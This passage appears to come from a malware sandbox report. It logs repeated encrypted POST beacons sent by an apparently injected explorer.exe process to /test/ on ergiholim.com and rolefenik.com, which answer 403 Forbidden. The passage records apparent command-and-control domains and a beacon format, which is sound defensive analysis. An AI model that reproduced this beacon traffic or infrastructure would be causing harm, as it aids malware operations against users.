                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.649989104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:36 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:36 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:37 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:37 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f4TKJqBpqaLi%2BZ5FR07Esw%2FyQ4uwxTz1tPZ6HCRDt5SHIVQon9ikKGizF0x0K9ri%2Fs1FrpG8UsojAEy%2Fv%2BxI2vvJ7ajnvkvisiOFY6v0FaAFavnbjSFlkTwTzTM1g8i2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20706d7f217360-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=146625&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21544&cwnd=32&unsent_bytes=0&cid=0b7508a203288348&ts=777&x=0"
                                                                                                                                          2024-11-13 17:21:37 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.649990104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:39 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:39 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:40 UTC748INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:39 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9kTvOMavf26j1iibm1aSLNkzSrTHJ8zo2tNPLS68zGmD%2BfBCIeeV3uyXhVPjENEDSaF4%2BAvd1dGcxExeHj50dKOy6xyKwUrt3BBOxihOWux85w04LhCEpHpEnvw%2FYeLr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e20707d7b97687c-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=137050&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=21240&cwnd=32&unsent_bytes=0&cid=6d163f834ae258d8&ts=721&x=0"
                                                                                                                                          2024-11-13 17:21:40 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.649991104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:40 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:40 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:41 UTC741INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:41 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3FoVGZDhveVTAhV2V2m28QmslPRgNuEg8payeIAXYhRkthudPxLd8lPmCyoa5wM1CMOJxbUQJQNt9XlAgDyDVXw2iB7BrQbwltLsTk4gmsp0CGF6U2nGMBKJQ0Y4zOTi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e207085f9bfc978-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33715&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=85957&cwnd=32&unsent_bytes=0&cid=bbef187e0638ecd2&ts=388&x=0"
                                                                                                                                          2024-11-13 17:21:41 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.649992104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:42 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:42 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:42 UTC749INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:42 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N2XnpGIVOuyZm0HGEfwSQ0Q8T1xsObXEkw69DoSwhCZyAfkuH7RYWI7ioxkP8mMSwlI03SlrAhN0sQHYSaww5IGme35dsqq2uVKuRNNbZGWdU%2FbCTv9%2B92hK5%2B%2Bds1vQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070907ae6c93c-IAD
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=33277&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=87355&cwnd=32&unsent_bytes=0&cid=3ad56ecc8f4f2042&ts=272&x=0"
                                                                                                                                          2024-11-13 17:21:42 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.649993104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:43 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:43 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:44 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:44 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sEfjc1YARPcS6W99KkJZOg28uaSWtwd8isRR8YSuYlkL9DEnP0nM2C94XtEWCbqN4Xvxa%2Fvzw3%2BmdN4%2B0QyqPv%2FFDKM3OPiMQFNtORO5DhKjzkg64Cz0Gw5dxDurxycM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070983c39e375-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=158580&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1167&delivery_rate=19444&cwnd=32&unsent_bytes=0&cid=dce779f60aff2a93&ts=829&x=0"
                                                                                                                                          2024-11-13 17:21:44 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.649994104.21.92.1054434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:45 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: rolefenik.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:45 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:46 UTC750INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:46 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ofAS9CWcRnsUuY8sB%2BNZ3KUKUy%2B7LIgaz%2FpEKSThvs8vExT2XEmCF4kjcY5ur1T6yd6CwAXzCT0vQaManc5VhXa0oFDt28gG5sWvjwmeaQzLSNR%2F64kaAkigl3fjAZ3r"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8e2070a3df49687d-NRT
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=208354&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=13997&cwnd=32&unsent_bytes=0&cid=26dade2761e9e9bf&ts=819&x=0"
                                                                                                                                          2024-11-13 17:21:46 UTC555INData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68
                                                                                                                                          Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Ch
                                                                                                                                          2024-11-13 17:21:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.649995104.21.15.1624434004C:\Windows\explorer.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-13 17:21:47 UTC415OUTPOST /test/ HTTP/1.1
                                                                                                                                          Accept: */*
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Cookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                          Host: ergiholim.com
                                                                                                                                          Content-Length: 92
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2024-11-13 17:21:47 UTC92OUTData Raw: 79 70 43 67 56 6b 30 79 34 55 71 68 32 33 39 73 38 57 36 4e 38 73 61 39 55 35 75 30 71 53 46 66 39 66 4a 46 64 70 37 56 51 4e 37 52 70 6c 48 4f 52 64 66 2f 39 7a 62 47 43 34 4a 2b 6e 2f 56 63 34 67 47 78 64 57 7a 2b 33 6b 47 51 53 64 69 65 65 51 6f 6d 5a 78 66 41 6b 4b 73 3d
                                                                                                                                          Data Ascii: ypCgVk0y4Uqh239s8W6N8sa9U5u0qSFf9fJFdp7VQN7RplHORdf/9zbGC4J+n/Vc4gGxdWz+3kGQSdieeQomZxfAkKs=
                                                                                                                                          2024-11-13 17:21:47 UTC752INHTTP/1.1 403 Forbidden
                                                                                                                                          Date: Wed, 13 Nov 2024 17:21:47 GMT
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          cf-cache-status: DYNAMIC
